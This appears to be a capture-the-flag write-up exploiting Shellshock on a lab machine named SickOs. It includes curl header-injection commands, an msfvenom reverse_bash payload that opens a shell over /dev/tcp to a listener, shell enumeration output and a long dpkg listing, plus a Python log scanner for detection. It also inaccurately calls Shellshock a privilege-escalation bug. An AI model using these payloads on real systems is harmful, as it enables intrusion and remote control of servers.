/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
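CVE-2014-6278, OSVDB-12184
How Shellshock works
Shellshock, also known as Bashdoor, is a security vulnerability in the Bash shell, which is widely used on Unix. Shellshock is a privilege-escalation vulnerability. It is very common on older machines, bash<=4.1.
Exploitation vectors
CGI-based web servers
OpenSSH server
DHCP clients
Qmail server
IBM HMC restricted shell
Reference links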
https://baike.baidu.com/item/Shellshock/15862860?fr=aladdin
https://www.cnblogs.com/jzking121/p/15142327.html
Verifying Shellshock
curl
-v shows more detail.
Pay attention to the spaces in the command.
sudo curl -v --proxy http://192.168.52.142:3128 http://192.168.52.142/cgi-bin/status -H "Referer:() { test;};echo 'Content-Type: text/plain';echo;echo;/usr/bin/id;exit"
* Trying 192.168.52.142:3128...
* Connected to 192.168.52.142 (192.168.52.142) port 3128 (#0)
> GET http://192.168.52.142/cgi-bin/status HTTP/1.1
> Host: 192.168.52.142
> User-Agent: curl/7.85.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Referer:() { test;};echo 'Content-Type: text/plain';echo;echo;/usr/bin/id;exit
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Date: Wed, 07 Jun 2023 16:47:05 GMT
< Server: Apache/2.2.22 (Ubuntu)
< Vary: Accept-Encoding
< Content-Type: text/plain
< X-Cache: MISS from localhost
< X-Cache-Lookup: MISS from localhost:3128
< Via: 1.0 localhost (squid/3.1.19)
< Connection: close
<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Closing connection 0
The response echoes the output of id.
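The probe above puts the function-definition prefix into a request header that Apache logs, so it can be found afterwards in the access log. The following Python code is an added example, not part of the original write-up: it scans combined-format log lines for that prefix. The default combined LogFormat is assumed; the sample lines and the names SAMPLE_LOG and scan are constructed for illustration.

```python
import re

# Apache "combined" format:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# Quoted fields may contain backslash-escaped quotes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r"^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "
    + QUOTED.replace("(", "(?P<request>", 1)
    + r" (?P<status>\d{3}) (?P<size>\S+) "
    + QUOTED.replace("(", "(?P<referer>", 1)
    + " "
    + QUOTED.replace("(", "(?P<agent>", 1)
)

# Bash imports an environment variable as a function only when its value
# begins with exactly these four characters, which is why the spacing in
# the header matters.
EXACT_PREFIX = "() {"
# Looser form for probes that embed or re-space the prefix. The lookbehind
# keeps ordinary text such as "function() {" from matching.
LOOSE_RE = re.compile(r"(?<!\w)\(\s*\)\s*\{")

# Constructed sample log (not captured from the target). Line 1 mirrors the
# curl probe shown above; through Squid the client address is the proxy.
SAMPLE_LOG = """\
192.168.52.142 - - [07/Jun/2023:12:47:05 -0400] "GET /cgi-bin/status HTTP/1.0" 200 53 "() { test;};echo 'Content-Type: text/plain';echo;echo;/usr/bin/id;exit" "curl/7.85.0"
192.168.52.142 - - [07/Jun/2023:12:47:40 -0400] "GET /index.php HTTP/1.0" 200 21 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.52.142 - - [07/Jun/2023:12:48:02 -0400] "GET /cgi-bin/status HTTP/1.0" 200 197 "-" "probe ()  { test; }; /usr/bin/id"
192.168.52.142 - - [07/Jun/2023:12:49:10 -0400] "GET /wolfcms/?about-us.html HTTP/1.0" 200 3975 "http://192.168.52.142/wolfcms/" "Mozilla/5.0 (X11; Linux x86_64) function() { return 1 }"
"""


def scan(log_text):
    """Return one finding per header field that carries the Shellshock prefix."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line
        request_parts = m["request"].split(" ")
        path = request_parts[1] if len(request_parts) > 1 else ""
        for field in ("request", "referer", "agent"):
            value = m[field].strip()
            if value.startswith(EXACT_PREFIX):
                kind = "function-prefix"
            elif LOOSE_RE.search(value):
                kind = "embedded"
            else:
                continue
            findings.append({
                "line": lineno,
                "client": m["host"],
                "field": field,
                "kind": kind,
                # A CGI target that answered 200 deserves the first look.
                "cgi": path.startswith("/cgi-bin/"),
                "status": int(m["status"]),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```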
Getting an initial shell via Shellshock
Building the payload
Generate the payload with msfvenom
sudo msfvenom -p cmd/unix/reverse_bash lhost=192.168.52.134 lport=14446 -f raw
Payload size: 79 bytes
bash -c '0<&113-;exec 113<>/dev/tcp/192.168.52.134/14446;sh <&113 >&113 2>&113'
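The generated payload calls sh (at 446;sh <&). When it runs, the PATH environment variable may not be set, and in that case a bare sh may not resolve. It is better to change sh to its full path, /bin/sh.
Add the generated payload to the command above: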
curl -v --proxy http://192.168.52.142:3128 http://192.168.52.142/cgi-bin/status -H "Referer:() { test;};0<&113-;exec 113<>/dev/tcp/192.168.52.134/14446;/bin/sh <&113 >&113 2>&113"
Reverse shell connection
Send the request and the listener receives the connection. This is not a full shell, though; it is not interactive.
nc -lvnp 14446
listening on [any] 14446 ...
connect to [192.168.52.134] from (UNKNOWN) [192.168.52.142] 35070
ls
status
pwd
/usr/lib/cgi-bin
Gathering information
whoami
www-data
uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:b8:7f:12
inet addr:192.168.52.142 Bcast:192.168.52.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feb8:7f12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:72672 errors:26 dropped:26 overruns:0 frame:0
TX packets:68866 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:50952579 (50.9 MB) TX bytes:53628509 (53.6 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:57873 errors:0 dropped:0 overruns:0 frame:0
TX packets:57873 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:26366636 (26.3 MB) TX bytes:26366636 (26.3 MB)
sudo -l
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Description
+++-================================-=================================-==========================================================================
ii accountsservice 0.6.15-2ubuntu9.7 query and manipulate user account information
ii acpid 1:2.0.10-1ubuntu3 Advanced Configuration and Power Interface event daemon
ii adduser 3.113ubuntu2 add and remove users and groups
ii apache2 2.2.22-1ubuntu1.10 Apache HTTP Server metapackage
ii apache2-mpm-prefork 2.2.22-1ubuntu1.10 Apache HTTP Server - traditional non-threaded model
ii apache2-utils 2.2.22-1ubuntu1.10 utility programs for webservers
ii apache2.2-bin 2.2.22-1ubuntu1.10 Apache HTTP Server common binary files
ii apache2.2-common 2.2.22-1ubuntu1.10 Apache HTTP Server common files
ii apparmor 2.7.102-0ubuntu3.9 User-space parser utility for AppArmor
ii apport 2.0.1-0ubuntu17.6 automatically generate crash reports for debugging
ii apport-symptoms 0.16.1 symptom scripts for apport
ii apt 0.8.16~exp12ubuntu10.16 commandline package manager
ii apt-transport-https 0.8.16~exp12ubuntu10.16 https download transport for APT
ii apt-utils 0.8.16~exp12ubuntu10.16 package managment related utility programs
ii apt-xapian-index 0.44ubuntu5.1 maintenance and search tools for a Xapian index of Debian packages
ii aptitude 0.6.6-1ubuntu1.2 terminal-based package manager (terminal interface only)
ii at 3.1.13-1ubuntu1 Delayed job execution and batch processing
ii base-files 6.5ubuntu6.7 Debian base system miscellaneous files
ii base-passwd 3.5.24 Debian base system master password and group files
ii bash 4.2-2ubuntu2.1 GNU Bourne Again SHell
ii bash-completion 1:1.3-1ubuntu8.1 programmable completion for the bash shell
ii bc 1.06.95-2ubuntu1 The GNU bc arbitrary precision calculator language
ii bind9-host 1:9.8.1.dfsg.P1-4ubuntu0.8 Version of 'host' bundled with BIND 9.X
ii binutils 2.22-6ubuntu1.3 GNU assembler, linker and binary utilities
ii bsdmainutils 8.2.3ubuntu1 collection of more utilities from FreeBSD
ii bsdutils 1:2.20.1-1ubuntu3 Basic utilities from 4.4BSD-Lite
ii busybox-initramfs 1:1.18.5-1ubuntu4.1 Standalone shell setup for initramfs
ii busybox-static 1:1.18.5-1ubuntu4.1 Standalone rescue shell with tons of builtin utilities
ii byobu 5.17-0ubuntu1 powerful, text based window manager and shell multiplexer
ii bzip2 1.0.6-1 high-quality block-sorting file compressor - utilities
ii ca-certificates 20111211 Common CA certificates
ii command-not-found 0.2.46ubuntu6 Suggest installation of packages in interactive bash sessions
ii command-not-found-data 0.2.46ubuntu6 Set of data files for command-not-found.
ii console-setup 1.70ubuntu5 console font and keymap setup program
ii coreutils 8.13-3ubuntu3.2 GNU core utilities
ii cpio 2.11-7ubuntu3 GNU cpio -- a program to manage archives of files
ii cpp 4:4.6.3-1ubuntu5 GNU C preprocessor (cpp)
ii cpp-4.6 4.6.3-1ubuntu5 GNU C preprocessor
ii cron 3.0pl1-120ubuntu4 process scheduling daemon
ii curl 7.22.0-3ubuntu4.7 Get a file from an HTTP, HTTPS or FTP server
ii dash 0.5.7-2ubuntu2 POSIX-compliant shell
ii dbus 1.4.18-1ubuntu1.4 simple interprocess messaging system (daemon and utilities)
ii debconf 1.5.42ubuntu1 Debian configuration management system
ii debconf-i18n 1.5.42ubuntu1 full internationalization support for debconf
ii debianutils 4.2.1ubuntu2 Miscellaneous utilities specific to Debian
ii diffutils 1:3.2-1ubuntu1 File comparison utilities
ii dmidecode 2.11-4 SMBIOS/DMI table decoder
ii dmsetup 2:1.02.48-4ubuntu7.4 The Linux Kernel Device Mapper userspace library
ii dnsutils 1:9.8.1.dfsg.P1-4ubuntu0.8 Clients provided with BIND
ii dosfstools 3.0.12-1ubuntu1.1 utilities for making and checking MS-DOS FAT filesystems
ii dpkg 1.16.1.2ubuntu7.2 Debian package management system
ii e2fslibs 1.42-1ubuntu2 ext2/ext3/ext4 file system libraries
ii e2fsprogs 1.42-1ubuntu2 ext2/ext3/ext4 file system utilities
ii ed 1.5-3 classic UNIX line editor
ii eject 2.1.5+deb1+cvs20081104-9 ejects CDs and operates CD-Changers under Linux
ii file 5.09-2 Determines file type using "magic" numbers
ii findutils 4.4.2-4ubuntu1 utilities for finding files--find, xargs
ii fontconfig-config 2.8.0-3ubuntu9.1 generic font configuration library - configuration
ii fonts-ubuntu-font-family-console 0.80-0ubuntu2 Ubuntu Font Family Linux console fonts, sans-serif monospace
ii friendly-recovery 0.2.25 Make recovery more user-friendly
ii ftp 0.17-25 classical file transfer client
ii fuse 2.8.6-2ubuntu2 Filesystem in Userspace
ii gcc 4:4.6.3-1ubuntu5 GNU C compiler
ii gcc-4.6 4.6.3-1ubuntu5 GNU C compiler
ii gcc-4.6-base 4.6.3-1ubuntu5 GCC, the GNU Compiler Collection (base package)
ii geoip-database 20111220-1 IP lookup command line tools that use the GeoIP library (country database)
ii gettext-base 0.18.1.1-5ubuntu3 GNU Internationalization utilities for the base system
ii gir1.2-glib-2.0 1.32.0-1 Introspection data for GLib, GObject, Gio and GModule
ii gnupg 1.4.11-3ubuntu2.5 GNU privacy guard - a free PGP replacement
ii gpgv 1.4.11-3ubuntu2.5 GNU privacy guard - signature verification tool
ii grep 2.10-1 GNU grep, egrep and fgrep
ii groff-base 1.21-7 GNU troff text-formatting system (base system components)
ii grub-common 1.99-21ubuntu3.18 GRand Unified Bootloader (common files)
ii grub-gfxpayload-lists 0.6 GRUB gfxpayload blacklist
ii grub-pc 1.99-21ubuntu3.18 GRand Unified Bootloader, version 2 (PC/BIOS version)
ii grub-pc-bin 1.99-21ubuntu3.18 GRand Unified Bootloader, version 2 (PC/BIOS binaries)
ii grub2-common 1.99-21ubuntu3.18 GRand Unified Bootloader (common files for version 2)
ii gzip 1.4-1ubuntu2 GNU compression utilities
ii hdparm 9.37-0ubuntu3.1 tune hard disk parameters for high performance
ii hostname 3.06ubuntu1 utility to set/show the host name or domain name
ii ifupdown 0.7~beta2ubuntu10 high level tools to configure network interfaces
ii info 4.13a.dfsg.1-8ubuntu2 Standalone GNU Info documentation browser
ii initramfs-tools 0.99ubuntu13.4 tools for generating an initramfs
ii initramfs-tools-bin 0.99ubuntu13.4 binaries used by initramfs-tools
ii initscripts 2.88dsf-13.10ubuntu11.1 scripts for initializing and shutting down the system
ii insserv 1.14.0-2.1ubuntu2 Tool to organize boot sequence using LSB init.d script dependencies
ii install-info 4.13a.dfsg.1-8ubuntu2 Manage installed documentation in info format
ii installation-report 2.46ubuntu1 system installation report
ii iproute 20111117-1ubuntu2.1 networking and traffic control tools
ii iptables 1.4.12-1ubuntu5 administration tools for packet filtering and NAT
ii iputils-ping 3:20101006-1ubuntu1 Tools to test the reachability of network hosts
ii iputils-tracepath 3:20101006-1ubuntu1 Tools to trace the network path to a remote host
ii irqbalance 0.56-1ubuntu4 Daemon to balance interrupts for SMP systems
ii isc-dhcp-client 4.1.ESV-R4-0ubuntu5.9 ISC DHCP client
ii isc-dhcp-common 4.1.ESV-R4-0ubuntu5.9 common files used by all the isc-dhcp* packages
ii iso-codes 3.31-1 ISO language, territory, currency, script codes and their translations
ii kbd 1.15.2-3ubuntu4 Linux console font and keytable utilities
ii keyboard-configuration 1.70ubuntu5 system-wide keyboard preferences
ii klibc-utils 1.5.25-1ubuntu2 small utilities built with klibc for early boot
ii krb5-locales 1.10+dfsg~beta1-2ubuntu0.3 Internationalization support for MIT Kerberos
ii landscape-common 13.07.3-0ubuntu0.12.04 The Landscape administration system client - Common files
ii language-pack-en 1:12.04+20140106 translation updates for language English
ii language-pack-en-base 1:12.04+20140106 translations for language English
ii language-selector-common 0.79.4 Language selector for Ubuntu
ii laptop-detect 0.13.7ubuntu2 attempt to detect a laptop
ii less 444-1ubuntu1 pager program similar to more
ii libaccountsservice0 0.6.15-2ubuntu9.7 query and manipulate user account information - shared libraries
ii libacl1 2.2.51-5ubuntu1 Access control list shared library
ii libapache2-mod-php5 5.3.10-1ubuntu3.21 server-side, HTML-embedded scripting language (Apache 2 module)
ii libapr1 1.4.6-1 Apache Portable Runtime Library
ii libaprutil1 1.3.12+dfsg-3 Apache Portable Runtime Utility Library
ii libaprutil1-dbd-sqlite3 1.3.12+dfsg-3 Apache Portable Runtime Utility Library - SQLite3 Driver
ii libaprutil1-ldap 1.3.12+dfsg-3 Apache Portable Runtime Utility Library - LDAP Driver
ii libapt-inst1.4 0.8.16~exp12ubuntu10.16 deb package format runtime library
ii libapt-pkg4.12 0.8.16~exp12ubuntu10.16 package managment runtime library
ii libasn1-8-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - ASN.1 library
ii libattr1 1:2.4.46-5ubuntu1 Extended attribute shared library
ii libbind9-80 1:9.8.1.dfsg.P1-4ubuntu0.8 BIND9 Shared Library used by BIND
ii libblkid1 2.20.1-1ubuntu3 block device id library
ii libboost-iostreams1.46.1 1.46.1-7ubuntu3 Boost.Iostreams Library
ii libbsd0 0.3.0-2 utility functions from BSD systems - shared library
ii libbz2-1.0 1.0.6-1 high-quality block-sorting file compressor library - runtime
ii libc-bin 2.15-0ubuntu10.12 Embedded GNU C Library: Binaries
ii libc-dev-bin 2.15-0ubuntu10.12 Embedded GNU C Library: Development binaries
ii libc6 2.15-0ubuntu10.12 Embedded GNU C Library: Shared libraries
ii libc6-dev 2.15-0ubuntu10.12 Embedded GNU C Library: Development Libraries and Header Files
ii libcap-ng0 0.6.6-1ubuntu1 An alternate POSIX capabilities library
ii libcap2 1:2.22-1ubuntu3 support for getting/setting POSIX.1e capabilities
ii libclass-accessor-perl 0.34-1 Perl module that automatically generates accessors
ii libclass-isa-perl 0.36-3 report the search path for a class's ISA tree
ii libcomerr2 1.42-1ubuntu2 common error description library
ii libcurl3 7.22.0-3ubuntu4.7 Multi-protocol file transfer library (OpenSSL)
ii libcurl3-gnutls 7.22.0-3ubuntu4.7 Multi-protocol file transfer library (GnuTLS)
ii libcwidget3 0.5.16-3.1ubuntu1 high-level terminal interface library for C++ (runtime files)
ii libdb5.1 5.1.25-11build1 Berkeley v5.1 Database Libraries [runtime]
ii libdbd-mysql-perl 4.020-1build2 Perl5 database interface to the MySQL database
ii libdbi-perl 1.616-1build2 Perl Database Interface (DBI)
ii libdbus-1-3 1.4.18-1ubuntu1.4 simple interprocess messaging system (library)
ii libdbus-glib-1-2 0.98-1ubuntu1.1 simple interprocess messaging system (GLib-based shared library)
ii libdevmapper1.02.1 2:1.02.48-4ubuntu7.4 The Linux Kernel Device Mapper userspace library
ii libdns81 1:9.8.1.dfsg.P1-4ubuntu0.8 DNS Shared Library used by BIND
ii libdrm-intel1 2.4.46-1ubuntu0.0.0.1 Userspace interface to intel-specific kernel DRM services -- runtime
ii libdrm-nouveau1a 2.4.46-1ubuntu0.0.0.1 Userspace interface to nouveau-specific kernel DRM services -- runtime
ii libdrm-radeon1 2.4.46-1ubuntu0.0.0.1 Userspace interface to radeon-specific kernel DRM services -- runtime
ii libdrm2 2.4.46-1ubuntu0.0.0.1 Userspace interface to kernel DRM services -- runtime
ii libedit2 2.11-20080614-3ubuntu2 BSD editline and history libraries
ii libelf1 0.152-1ubuntu3 library to read and write ELF files
ii libept1.4.12 1.0.6~exp1ubuntu1 High-level library for managing Debian package information
ii libevent-2.0-5 2.0.16-stable-1 Asynchronous event notification library
ii libexpat1 2.0.1-7.2ubuntu1.1 XML parsing C library - runtime library
ii libffi6 3.0.11~rc1-5 Foreign Function Interface library runtime
ii libfontconfig1 2.8.0-3ubuntu9.1 generic font configuration library - runtime
ii libfreetype6 2.4.8-1ubuntu2.3 FreeType 2 font engine, shared library files
ii libfribidi0 0.19.2-1 Free Implementation of the Unicode BiDi algorithm
ii libfuse2 2.8.6-2ubuntu2 Filesystem in Userspace (library)
ii libgc1c2 1:7.1-8ubuntu0.12.04.1 conservative garbage collector for C and C++
ii libgcc1 1:4.6.3-1ubuntu5 GCC support library
ii libgcrypt11 1.5.0-3ubuntu0.2 LGPL Crypto library - runtime library
ii libgd2-xpm 2.0.36~rc1~dfsg-6ubuntu2 GD Graphics Library version 2
ii libgdbm3 1.8.3-10 GNU dbm database routines (runtime version)
ii libgeoip1 1.4.8+dfsg-2 non-DNS IP-to-country resolver library
ii libgirepository-1.0-1 1.32.0-1 Library for handling GObject introspection data (runtime library)
ii libglib2.0-0 2.32.4-0ubuntu1 GLib library of C routines
ii libgmp10 2:5.0.2+dfsg-2ubuntu1 Multiprecision arithmetic library
ii libgnutls26 2.12.14-5ubuntu3.5 GNU TLS library - runtime library
ii libgomp1 4.6.3-1ubuntu5 GCC OpenMP (GOMP) support library
ii libgpg-error0 1.10-2ubuntu1 library for common error values and messages in GnuPG components
ii libgpm2 1.20.4-4 General Purpose Mouse - shared library
ii libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.3 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
ii libgssapi3-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - GSSAPI support library
ii libhcrypto4-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - crypto library
ii libheimbase1-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - Base library
ii libheimntlm0-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - NTLM support library
ii libhtml-template-perl 2.10-1 module for using HTML Templates with Perl
ii libhx509-5-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - X509 support library
ii libidn11 1.23-2 GNU Libidn library, implementation of IETF IDN specifications
ii libio-string-perl 1.08-2 Emulate IO::File interface for in-core strings
ii libisc83 1:9.8.1.dfsg.P1-4ubuntu0.8 ISC Shared Library used by BIND
ii libisccc80 1:9.8.1.dfsg.P1-4ubuntu0.8 Command Channel Library used by BIND
ii libisccfg82 1:9.8.1.dfsg.P1-4ubuntu0.8 Config File Handling Library used by BIND
ii libiw30 30~pre9-5ubuntu2 Wireless tools - library
ii libjpeg-turbo8 1.1.90+svn733-0ubuntu4.4 IJG JPEG compliant runtime library.
ii libjpeg8 8c-2ubuntu7 Independent JPEG Group's JPEG runtime library (dependency package)
ii libjs-jquery 1.7.1-1ubuntu1 JavaScript library for dynamic web applications
ii libk5crypto3 1.10+dfsg~beta1-2ubuntu0.3 MIT Kerberos runtime libraries - Crypto Library
ii libkeyutils1 1.5.2-2 Linux Key Management Utilities (library)
ii libklibc 1.5.25-1ubuntu2 minimal libc subset for use with initramfs
ii libkrb5-26-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - libraries
ii libkrb5-3 1.10+dfsg~beta1-2ubuntu0.3 MIT Kerberos runtime libraries
ii libkrb5support0 1.10+dfsg~beta1-2ubuntu0.3 MIT Kerberos runtime libraries - Support library
ii libldap-2.4-2 2.4.28-1.1ubuntu4.4 OpenLDAP libraries
ii liblocale-gettext-perl 1.05-7build1 module using libc functions for internationalization in Perl
ii liblockfile-bin 1.09-3ubuntu0.1 support binaries for and cli utilities based on liblockfile
ii liblockfile1 1.09-3ubuntu0.1 NFS-safe locking library
ii libltdl7 2.4.2-1ubuntu1 A system independent dlopen wrapper for GNU libtool
ii liblwres80 1:9.8.1.dfsg.P1-4ubuntu0.8 Lightweight Resolver Library used by BIND
ii liblzma5 5.1.1alpha+20110809-3 XZ-format compression library
ii libmagic1 5.09-2 File type determination library using "magic" numbers
ii libmcrypt4 2.5.8-3.1 De-/Encryption Library
ii libmount1 2.20.1-1ubuntu3 block device id library
ii libmpc2 0.9-4 multiple precision complex floating-point library
ii libmpfr4 3.1.0-3ubuntu2 multiple precision floating-point computation
ii libmysqlclient18 5.5.46-0ubuntu0.12.04.2 MySQL database client library
ii libncurses5 5.9-4 shared libraries for terminal handling
ii libncursesw5 5.9-4 shared libraries for terminal handling (wide character support)
ii libnet-daemon-perl 0.48-1 Perl module for building portable Perl daemons easily
ii libnewt0.52 0.52.11-2ubuntu10 Not Erik's Windowing Toolkit - text mode windowing with slang
ii libnfnetlink0 1.0.0-1 Netfilter netlink library
ii libnih-dbus1 1.0.3-4ubuntu9.1 NIH D-Bus Bindings Library
ii libnih1 1.0.3-4ubuntu9.1 NIH Utility Library
ii libnl-3-200 3.2.3-2ubuntu2 library for dealing with netlink sockets
ii libnl-genl-3-200 3.2.3-2ubuntu2 library for dealing with netlink sockets - generic netlink
ii libp11-kit0 0.12-2ubuntu1 Library for loading and coordinating access to PKCS#11 modules - runtime
ii libpam-modules 1.1.3-7ubuntu2 Pluggable Authentication Modules for PAM
ii libpam-modules-bin 1.1.3-7ubuntu2 Pluggable Authentication Modules for PAM - helper binaries
ii libpam-runtime 1.1.3-7ubuntu2 Runtime support for the PAM library
ii libpam0g 1.1.3-7ubuntu2 Pluggable Authentication Modules library
ii libparse-debianchangelog-perl 1.2.0-1ubuntu1 parse Debian changelogs and output them in other formats
ii libparted0debian1 2.3-8ubuntu5.1 disk partition manipulator - shared library
ii libpcap0.8 1.1.1-10 system interface for user-level packet capture
ii libpci3 1:3.1.8-2ubuntu6 Linux PCI Utilities (shared library)
ii libpciaccess0 0.12.902-1ubuntu0.2 Generic PCI access library for X
ii libpcre3 8.12-4 Perl 5 Compatible Regular Expression Library - runtime files
ii libpcsclite1 1.7.4-2ubuntu2 Middleware to access a smart card using PC/SC (library)
ii libpipeline1 1.2.1-1 pipeline manipulation library
ii libplrpc-perl 0.2020-2 Perl extensions for writing PlRPC servers and clients
ii libplymouth2 0.8.2-2ubuntu31.1 graphical boot animation and logger - shared libraries
ii libpng12-0 1.2.46-3ubuntu4 PNG library - runtime
ii libpolkit-gobject-1-0 0.104-1ubuntu1.1 PolicyKit Authorization API
ii libpopt0 1.16-3ubuntu1 lib for parsing cmdline parameters
ii libpython2.7 2.7.3-0ubuntu3.4 Shared Python runtime library (version 2.7)
ii libquadmath0 4.6.3-1ubuntu5 GCC Quad-Precision Math Library
ii libreadline6 6.2-8 GNU readline and history libraries, run-time libraries
ii libroken18-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - roken support library
ii librtmp0 2.4~20110711.gitc28f1bab-1 toolkit for RTMP streams (shared library)
ii libsasl2-2 2.1.25.dfsg1-3ubuntu0.1 Cyrus SASL - authentication abstraction library
ii libsasl2-modules 2.1.25.dfsg1-3ubuntu0.1 Cyrus SASL - pluggable authentication modules
ii libselinux1 2.1.0-4.1ubuntu1 SELinux runtime shared libraries
ii libsigc++-2.0-0c2a 2.2.10-0ubuntu2 type-safe Signal Framework for C++ - runtime
ii libslang2 2.2.4-3ubuntu1 S-Lang programming library - runtime version
ii libsqlite3-0 3.7.9-2ubuntu1.1 SQLite 3 shared library
ii libss2 1.42-1ubuntu2 command-line interface parsing library
ii libssl1.0.0 1.0.1-4ubuntu5.11 SSL shared libraries
ii libstdc++6 4.6.3-1ubuntu5 GNU Standard C++ Library v3
ii libsub-name-perl 0.05-1build2 module for assigning a new name to referenced sub
ii libswitch-perl 2.16-2 switch statement for Perl
ii libt1-5 5.1.2-3.4ubuntu1 Type 1 font rasterizer library - runtime
ii libtasn1-3 2.10-1ubuntu1.1 Manage ASN.1 structures (runtime)
ii libterm-readkey-perl 2.30-4build3 A perl module for simple terminal control
ii libtext-charwidth-perl 0.04-7build1 get display widths of characters on the terminal
ii libtext-iconv-perl 1.7-5 converts between character sets in Perl
ii libtext-wrapi18n-perl 0.06-7 internationalized substitute of Text::Wrap
ii libtimedate-perl 1.2000-1 collection of modules to manipulate date/time information
ii libtinfo5 5.9-4 shared low-level terminfo library for terminal handling
ii libudev0 175-0ubuntu9.4 udev library
ii libusb-0.1-4 2:0.1.12-20 userspace USB programming library
ii libusb-1.0-0 2:1.0.9~rc3-2ubuntu1 userspace USB programming library
ii libuuid1 2.20.1-1ubuntu3 Universally Unique ID library
ii libwind0-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - stringprep implementation
ii libwrap0 7.6.q-21 Wietse Venema's TCP wrappers library
ii libx11-6 2:1.4.99.1-0ubuntu2.2 X11 client-side library
ii libx11-data 2:1.4.99.1-0ubuntu2.2 X11 client-side library
ii libxapian22 1.2.8-1 Search engine library
ii libxau6 1:1.0.6-4 X11 authorisation library
ii libxcb1 1.8.1-1ubuntu0.2 X C Binding
ii libxdmcp6 1:1.1.0-4 X11 Display Manager Control Protocol library
ii libxext6 2:1.3.0-3ubuntu0.1 X11 miscellaneous extension library
ii libxml2 2.7.8.dfsg-5.1ubuntu4.6 GNOME XML library
ii libxmuu1 2:1.1.0-3 X11 miscellaneous micro-utility library
ii libxpm4 1:3.5.9-4 X11 pixmap library
ii linux-firmware 1.79.9 Firmware for Linux kernel drivers
ii linux-generic-lts-saucy 3.11.0.15.14 Generic Linux kernel image and headers
ii linux-headers-3.11.0-15 3.11.0-15.25~precise1 Header files related to Linux kernel version 3.11.0
ii linux-headers-3.11.0-15-generic 3.11.0-15.25~precise1 Linux kernel headers for version 3.11.0 on 32 bit x86 SMP
ii linux-headers-generic-lts-saucy 3.11.0.15.14 Generic Linux kernel headers
ii linux-image-3.11.0-15-generic 3.11.0-15.25~precise1 Linux kernel image for version 3.11.0 on 32 bit x86 SMP
ii linux-image-generic-lts-saucy 3.11.0.15.14 Generic Linux kernel image
ii linux-libc-dev 3.2.0-90.128 Linux Kernel Headers for development
ii locales 2.13+git20120306-3 common files for locale support
ii lockfile-progs 0.1.16 Programs for locking and unlocking files and mailboxes
ii login 1:4.1.4.2+svn3283-3ubuntu5.1 system login tools
ii logrotate 3.7.8-6ubuntu5 Log rotation utility
ii lsb-base 4.0-0ubuntu20.3 Linux Standard Base 4.0 init script functionality
ii lsb-release 4.0-0ubuntu20.3 Linux Standard Base version reporting utility
ii lshw 02.15-2 information about hardware configuration
ii lsof 4.81.dfsg.1-1build1 List open files
ii ltrace 0.5.3-2.1ubuntu2 Tracks runtime library calls in dynamically linked programs
ii makedev 2.3.1-89ubuntu2 creates device files in /dev
ii man-db 2.6.1-2ubuntu1 on-line manual pager
ii manpages 3.35-0.1ubuntu1 Manual pages about using a GNU/Linux system
ii manpages-dev 3.35-0.1ubuntu1 Manual pages about using GNU/Linux for development
ii mawk 1.3.3-17 a pattern scanning and text processing language
ii memtest86+ 4.20-1.1ubuntu1 thorough real-mode memory tester
ii mime-support 3.51-1ubuntu1 MIME files 'mime.types' & 'mailcap', and support programs
ii mlocate 0.23.1-1ubuntu2 quickly find files on the filesystem based on their name
ii module-init-tools 3.16-1ubuntu2 tools for managing Linux kernel modules
ii mount 2.20.1-1ubuntu3 Tools for mounting and manipulating filesystems
ii mountall 2.36.4 filesystem mounting tool
ii mtr-tiny 0.80-1ubuntu1 Full screen ncurses traceroute tool
ii multiarch-support 2.15-0ubuntu10.5 Transitional package to ensure multiarch compatibility
ii mysql-client-5.5 5.5.46-0ubuntu0.12.04.2 MySQL database client binaries
ii mysql-client-core-5.5 5.5.46-0ubuntu0.12.04.2 MySQL database core client binaries
